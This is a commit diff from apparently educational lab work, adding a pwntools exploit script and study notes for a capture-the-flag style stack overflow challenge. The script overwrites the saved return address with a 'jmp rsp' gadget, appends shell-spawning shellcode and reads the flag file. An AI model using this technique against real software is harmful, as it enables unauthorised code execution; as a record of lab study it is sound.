lab 4b.3 - some more shellcode

4b/lab4b_3.py

@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template /challenge/run
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or "/challenge/run")
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+def start(argv=[], *a, **kw):
+    """Start the exploit against the target."""
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = """
+b vuln
+continue
+""".format(
+    **locals()
+)
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+# Arch:     amd64-64-little
+# RELRO:    No RELRO
+# Stack:    No canary found
+# NX:       NX unknown - GNU_STACK missing
+# PIE:      No PIE (0x400000)
+# Stack:    Executable
+# RWX:      Has RWX segments
+
+io = start()
+
+target_fn = 0x401146
+
+unbound_buffer = 0x7FFDE3E76C00
+saved_rip = 0x7FFDE3E76C48
+offset = saved_rip - unbound_buffer
+
+payload_padding = b"F" * offset  # pad until saved_rip
+payload_rip = p64(target_fn)  # in this challenge, we target the jmp rsp code
+payload_shellcode = asm(shellcraft.sh())  # from pwn
+payload = payload_padding + payload_rip + payload_shellcode + b"\n"
+
+io.send(payload)
+print("[>>>] Sending payload...")
+
+# root shell gained
+io.send(b"cat /flag \n")
+
+io.interactive()

Dojo Notes.md

@@ -453,7 +453,7 @@ done
 
 ### .26 - arg wars V - the system strikes back
 
-- pipe symbol now added to filter 
+- pipe symbol now added to filter
 - luckily we didn't use that
 
 ### .27 - overflow gods
@@ -479,3 +479,15 @@ done
 
 - even more direct access - no addition of address, just direct address control (lol)
 - set flag to `0xdeadfeed`
+
+### lab 4b.3 - overflow + a defense
+
+- similar to 4b.1 and 4b.2
+- but here we dont have RSP so we cant point RIP to it
+- instead there's a function that has `jmp *%rsp`
+- so first, pad the vulnerable stack buffer upto the saved RIP's address
+- put that function's address in it
+- now, remember that when a function returns, it pops its stack
+- so we need to put our shellcode after this saved RIP's location
+- that way, when the current function returns into the target function, the target function's RSP will point to the shellcode
+- boom